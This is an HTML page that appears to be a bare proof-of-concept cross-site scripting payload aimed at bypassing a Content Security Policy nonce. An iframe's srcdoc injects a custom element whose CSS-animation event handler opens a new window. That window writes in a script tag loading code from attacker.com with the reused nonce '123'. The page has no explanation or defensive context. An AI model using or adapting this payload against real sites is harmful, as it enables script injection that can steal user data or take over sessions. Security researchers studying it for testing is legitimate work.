<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGSNTDlGGGGG" src="about:blank"></iframe><script nonce="123">GGGGGSNTDlGGGGG.addEventListener("load",()=>{GGGGGSNTDlGGGGG.srcdoc="<style>@keyframes GGGGSNTDlGGGG{}<\/style><xss style=animation-name:GGGGSNTDlGGGG onanimationstart='w=window.open(`about:blank`); w.document.write(`<script src=https://attacker.com/static/static.js nonce=123><\\/script>`);'><\/xss>";},{once:true});</script>
</body>
</html>
